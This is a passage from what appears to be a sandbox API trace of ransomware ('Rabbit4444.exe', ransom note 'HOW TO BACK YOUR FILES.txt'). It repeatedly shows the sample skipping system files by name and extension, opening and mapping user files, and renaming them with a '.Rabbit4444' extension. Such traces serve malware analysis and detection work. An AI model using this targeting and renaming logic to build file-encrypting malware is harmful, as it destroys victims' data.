cAlternateFileName="CL0455~1.SET")) returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2=".") returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="..") returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="windows") returned -1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="boot") returned 1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.575] lstrcmpiW (lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.575] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms" | out: lpString1="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms") returned="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms" [0058.575] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.575] lstrlenW (lpString="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms") returned 64 [0058.575] lstrlenW (lpString="Rabbit4444") returned 10 [0058.575] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.575] lstrlenW (lpString=".dll") returned 4 [0058.575] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.575] lstrlenW (lpString=".lnk") returned 4 [0058.575] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.575] lstrlenW (lpString=".ini") returned 4 [0058.575] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.576] lstrlenW (lpString=".sys") returned 4 [0058.576] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.576] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a4140c8-50d3-44e9-bf50-c878204de0f5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.576] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.576] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14988664726) returned 1 [0058.576] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1241) returned 1 [0058.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0058.576] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0058.577] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0058.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.578] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14988910821) returned 1 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0058.578] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.579] CloseHandle (hObject=0x298) returned 1 [0058.579] CloseHandle (hObject=0x278) returned 1 [0058.579] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms.Rabbit4444") returned 192 [0058.579] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a4140c8-50d3-44e9-bf50-c878204de0f5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a4140c8-50d3-44e9-bf50-c878204de0f5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.580] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ced1dd7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ced1dd7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", cAlternateFileName="CLE345~1.SET")) returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2=".") returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="..") returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="windows") returned -1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="boot") returned 1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.584] lstrcmpiW (lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.584] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms" | out: lpString1="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms") returned="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms" [0058.584] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.585] lstrlenW (lpString="Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms") returned 64 [0058.585] lstrlenW (lpString="Rabbit4444") returned 10 [0058.585] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.585] lstrlenW (lpString=".dll") returned 4 [0058.585] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.585] lstrlenW (lpString=".lnk") returned 4 [0058.585] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.585] lstrlenW (lpString=".ini") returned 4 [0058.585] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.585] lstrlenW (lpString=".sys") returned 4 [0058.585] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3f0ad6db-3246-48e4-acd7-696ff62ae68d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.585] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.585] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14989591414) returned 1 [0058.585] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1011) returned 1 [0058.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.585] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.586] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.588] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14989837963) returned 1 [0058.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.588] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.588] CloseHandle (hObject=0x298) returned 1 [0058.588] CloseHandle (hObject=0x278) returned 1 [0058.588] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms.Rabbit4444") returned 192 [0058.588] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3f0ad6db-3246-48e4-acd7-696ff62ae68d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3f0ad6db-3246-48e4-acd7-696ff62ae68d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.592] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfb6be1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4cfb6be1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", cAlternateFileName="CL79AA~1.SET")) returned 1 [0058.592] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.592] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.592] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.592] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2=".") returned 1 [0058.592] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="..") returned 1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="windows") returned -1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="boot") returned 1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.593] lstrcmpiW (lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.593] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms" | out: lpString1="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms") returned="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms" [0058.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.593] lstrlenW (lpString="Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms") returned 64 [0058.593] lstrlenW (lpString="Rabbit4444") returned 10 [0058.593] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.593] lstrlenW (lpString=".dll") returned 4 [0058.593] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.593] lstrlenW (lpString=".lnk") returned 4 [0058.593] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.593] lstrlenW (lpString=".ini") returned 4 [0058.593] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.593] lstrlenW (lpString=".sys") returned 4 [0058.593] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.594] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.594] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14990442566) returned 1 [0058.594] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1074) returned 1 [0058.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0058.594] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0058.596] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0058.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.597] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14990818682) returned 1 [0058.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.598] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0058.598] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.598] CloseHandle (hObject=0x298) returned 1 [0058.598] CloseHandle (hObject=0x278) returned 1 [0058.598] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms.Rabbit4444") returned 192 [0058.598] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.599] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d34a43d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4d34a43d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", cAlternateFileName="CLA493~1.SET")) returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2=".") returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="..") returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="windows") returned -1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="boot") returned 1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.599] lstrcmpiW (lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.599] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms" | out: lpString1="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms") returned="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms" [0058.599] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.599] lstrlenW (lpString="Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms") returned 64 [0058.599] lstrlenW (lpString="Rabbit4444") returned 10 [0058.599] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.599] lstrlenW (lpString=".dll") returned 4 [0058.599] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.599] lstrlenW (lpString=".lnk") returned 4 [0058.599] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.599] lstrlenW (lpString=".ini") returned 4 [0058.600] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.600] lstrlenW (lpString=".sys") returned 4 [0058.600] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.600] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: 